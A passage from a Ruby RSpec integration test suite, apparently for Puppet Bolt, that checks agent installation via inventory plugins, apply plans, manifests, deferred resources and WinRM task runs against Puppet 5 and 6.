end
end
context "when installing puppet" do
before(:each) do
uninstall = '/opt/puppetlabs/bin/puppet resource package puppet-agent ensure=absent'
run_cli_json(%W[command run #{uninstall}] + config_flags)
end
context 'with plugin configured' do
let(:config_flags) { %W[--format json -n all --password #{password} --modulepath #{modulepath}] + tflags }
let(:ssh_node) { conn_uri('ssh', include_password: true) }
before(:each) do
uninstall(ssh_node)
end
it 'with puppet_agent plugin configured installs the agent' do
with_tempfile_containing('inventory', YAML.dump(lib_plugin_inventory), '.yaml') do |inv|
result = run_cli_json(%W[plan run prep -i #{inv.path}] + config_flags)
expect(result).not_to include('kind')
expect(result.count).to eq(1)
expect(result[0]['status']).to eq('success')
report = result[0]['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{conn_uri('ssh')}]")
end
end
it 'errors appropriately per target' do
with_tempfile_containing('inventory', YAML.dump(error_plugin_inventory), '.yaml') do |inv|
result = run_cli_json(%W[plan run prep -i #{inv.path}] + config_flags)
expect(result['kind']).to eq('bolt/run-failure')
expect(result['msg']).to eq("Plan aborted: apply_prep failed on 3 targets")
result_set = result['details']['result_set']
task_error = result_set.select { |h| h['node'] == 'error' }[0]['result']['_error']
expect(task_error['kind']).to eq('puppetlabs.tasks/task-error')
expect(task_error['msg']).to include("The task failed with exit code 1")
param_error = result_set.select { |h| h['node'] == 'badparams' }[0]['result']['_error']
expect(param_error['kind']).to eq('bolt/plugin-error')
expect(param_error['msg']).to include("Invalid parameters for Task puppet_agent::install")
plugin_error = result_set.select { |h| h['node'] == 'badplugin' }[0]['result']['_error']
expect(plugin_error['kind']).to eq('bolt/unknown-plugin')
expect(plugin_error['msg']).to include("Unknown plugin: 'what plugin?'")
end
end
it 'with task plugin configured installs the agent' do
with_tempfile_containing('inventory', YAML.dump(task_plugin_inventory), '.yaml') do |inv|
result = run_cli_json(%W[plan run prep -i #{inv.path}] + config_flags)
expect(result).not_to include('kind')
expect(result.count).to eq(1)
expect(result[0]['status']).to eq('success')
report = result[0]['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{conn_uri('ssh')}]")
result = run_cli_json(%W[task run puppet_agent::version -i #{inv.path}] + config_flags)['items']
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^6\.2/)
end
end
end
it 'succeeds when run twice' do
result = run_cli_json(%w[plan run prep] + config_flags)
expect(result).not_to include('kind')
expect(result.count).to eq(1)
expect(result[0]['status']).to eq('success')
report = result[0]['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{conn_uri('ssh')}]")
# Includes agent facts from apply_prep
agent_facts = report['resource_statuses']['Notify[agent facts]']['events'][0]['desired_value'].split("\n")
expect(agent_facts[0]).to match(/^\w+/)
expect(agent_facts[1]).to eq(agent_facts[0])
expect(agent_facts[2]).to match(/^\d+\.\d+\.\d+$/)
expect(agent_facts[3]).to eq(agent_facts[2])
expect(agent_facts[4]).to eq('false')
result = run_cli_json(%w[plan run prep] + config_flags)
expect(result.count).to eq(1)
expect(result[0]['status']).to eq('success')
report = result[0]['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{conn_uri('ssh')}]")
end
end
context "with a puppet_agent installed" do
before(:all) do
# Deferred must use puppet >= 6
target = 'puppet_6'
install(target, inventory: agent_version_inventory)
result = run_task('puppet_agent::version', target, {}, config: root_config, inventory: agent_version_inventory)
major_version = result.first['result']['version'].split('.').first.to_i
expect(major_version).to be >= 6
end
context "apply() function" do
it 'errors when there are resource failures' do
result = run_cli_json(%w[plan run basic::failure] + config_flags, rescue_exec: true)
expect(result).to include('kind' => 'bolt/apply-failure')
error = result['details']['result_set'][0]['result']['_error']
expect(error['kind']).to eq('bolt/resource-failure')
expect(error['msg']).to match(/Resources failed to apply/)
end
it 'applies a notify and ignores local settings' do
run_command('echo environment=doesnotexist > /etc/puppetlabs/puppet/puppet.conf',
uri, config: root_config, inventory: conn_inventory)
result = run_cli_json(%w[plan run basic::class] + config_flags)
expect(result).not_to include('kind')
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['_output']).to eq('changed: 1, failed: 0, unchanged: 0 skipped: 0, noop: 0')
resources = result[0]['result']['report']['resource_statuses']
expect(resources).to include('Notify[hello world]')
end
it 'applies the deferred type' do
result = run_cli_json(%w[plan run basic::defer] + config_flags)
expect(result).not_to include('kind')
expect(result[0]['status']).to eq('success')
resources = result[0]['result']['report']['resource_statuses']
local_pid = resources['Notify[local pid]']['events'][0]['desired_value'][/(\d+)/, 1]
raise 'local pid was not found' if local_pid.nil?
remote_pid = resources['Notify[remote pid]']['events'][0]['desired_value'][/(\d+)/, 1]
raise 'remote pid was not found' if remote_pid.nil?
expect(local_pid).not_to eq(remote_pid)
end
it 'respects _run_as on a plan invocation' do
user = conn_info('ssh')[:user]
logs = run_cli_json(%W[plan run basic::run_as_apply user=#{user}] + config_flags)
expect(logs.first['message']).to eq(conn_info('ssh')[:user])
end
end
context "bolt apply command" do
it "applies a manifest" do
with_tempfile_containing('manifest', 'include basic', '.pp') do |manifest|
results = run_cli_json(['apply', manifest.path] + config_flags)
result = results[0]['result']
expect(result).not_to include('kind')
expect(result['report']).to include('status' => 'changed')
expect(result['report']['resource_statuses']).to include('Notify[hello world]')
end
end
it "applies with noop" do
with_tempfile_containing('manifest', 'include basic', '.pp') do |manifest|
results = run_cli_json(['apply', manifest.path, '--noop'] + config_flags)
result = results[0]['result']
expect(result).not_to include('kind')
expect(result['report']).to include('status' => 'unchanged', 'noop' => true)
expect(result['report']['resource_statuses']).to include('Notify[hello world]')
end
end
it "applies a snippet of code" do
results = run_cli_json(['apply', '-e', 'include basic'] + config_flags)
result = results[0]['result']
expect(result).not_to include('kind')
expect(result['report']).to include('status' => 'changed')
expect(result['report']['resource_statuses']).to include('Notify[hello world]')
end
it "applies a node definition" do
results = run_cli_json(['apply', '-e', 'node default { notify { "hello world": } }'] + config_flags)
result = results[0]['result']
expect(result).not_to include('kind')
expect(result['report']).to include('status' => 'changed')
expect(result['report']['resource_statuses']).to include('Notify[hello world]')
end
it "fails if the manifest doesn't parse" do
expect { run_cli_json(['apply', '-e', 'include(basic'] + config_flags) }
.to raise_error(/Syntax error/)
end
it "fails if the manifest doesn't compile" do
results = run_cli_json(['apply', '-e', 'include shmasic'] + config_flags)
result = results[0]['result']
expect(result).to include('_error')
expect(result['_error']['kind']).to eq('bolt/apply-error')
expect(result['_error']['msg']).to match(/failed to compile/)
end
end
end
end
describe 'over winrm on Windows with Puppet Agents', windows_agents: true do
let(:uri) { conn_uri('winrm') }
let(:password) { conn_info('winrm')[:password] }
let(:user) { conn_info('winrm')[:user] }
def config
{ 'modulepath' => File.join(__dir__, '../fixtures/apply'),
'winrm' => {
'ssl' => false,
'ssl-verify' => false,
'user' => conn_info('winrm')[:user],
'password' => conn_info('winrm')[:password]
} }
end
context "when running against puppet 5" do
before(:all) do
result = run_task('puppet_agent::install', conn_uri('winrm'),
{ 'collection' => 'puppet5' }, config: config)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
result = run_task('puppet_agent::version', conn_uri('winrm'), {}, config: config)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^5/)
end
it 'runs a ruby task' do
with_tempfile_containing('bolt', YAML.dump(config), '.yaml') do |conf|
results = run_cli_json(%W[task run basic::ruby_task --targets #{uri}
--configfile #{conf.path}])
results['items'].each do |result|
expect(result).to include('status' => 'success')
expect(result['result']).to eq('ruby' => 'Hi')
end
end
end
it 'runs an apply plan' do
with_tempfile_containing('bolt', YAML.dump(config), '.yaml') do |conf|
results = run_cli_json(%W[plan run basic::notify --targets #{uri}
--configfile #{conf.path}])
results.each do |result|
expect(result).to include('status' => 'success')
report = result['result']['report']
expect(report['resource_statuses']).to include("Notify[Apply: Hi!]")
end
end
end
it 'does not create Boltdir' do
is_boltdir = "if (!(Test-Path ~/.puppetlabs)) {echo 'not found'}"
results = run_command(is_boltdir, conn_uri('winrm'), config: config)
results.each do |result|
expect(result).to include('status' => 'success')
expect(result['result']['stdout']).to match(/not found/)
end
end
end
context "when running against puppet 6" do
before(:all) do
result = run_task('puppet_agent::install', conn_uri('winrm'),
{ 'collection' => 'puppet6', 'version' => 'latest' }, config: config)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
result = run_task('puppet_agent::version', conn_uri('winrm'), {}, config: config)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^6/)
end
it 'runs a ruby task' do
with_tempfile_containing('bolt', YAML.dump(config), '.yaml') do |conf|
results = run_cli_json(%W[task run basic::ruby_task --targets #{uri}
--configfile #{conf.path}])
results['items'].each do |result|
expect(result).to include('status' => 'success')
expect(result['result']).to eq('ruby' => 'Hi')
end
end
end
it 'runs an apply plan' do
with_tempfile_containing('bolt', YAML.dump(config), '.yaml') do |conf|
results = run_cli_json(%W[plan run basic::notify --targets #{uri}
--configfile #{conf.path}])
results.each do |result|
expect(result).to include('status' => 'success')
report = result['result']['report']
expect(report['resource_statuses']).to include("Notify[Apply: Hi!]")
end
end
end
it 'does not create Boltdir' do
is_boltdir = "if (!(Test-Path ~/.puppetlabs)) {echo 'not found'}"
results = run_command(is_boltdir, conn_uri('winrm'), config: config)
results.each do |result|
expect(result).to include('status' => 'success')
expect(result['result']['stdout']).to match(/not found/)
end
end
end
end
end
| 41.83 | 119 | 0.568826 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.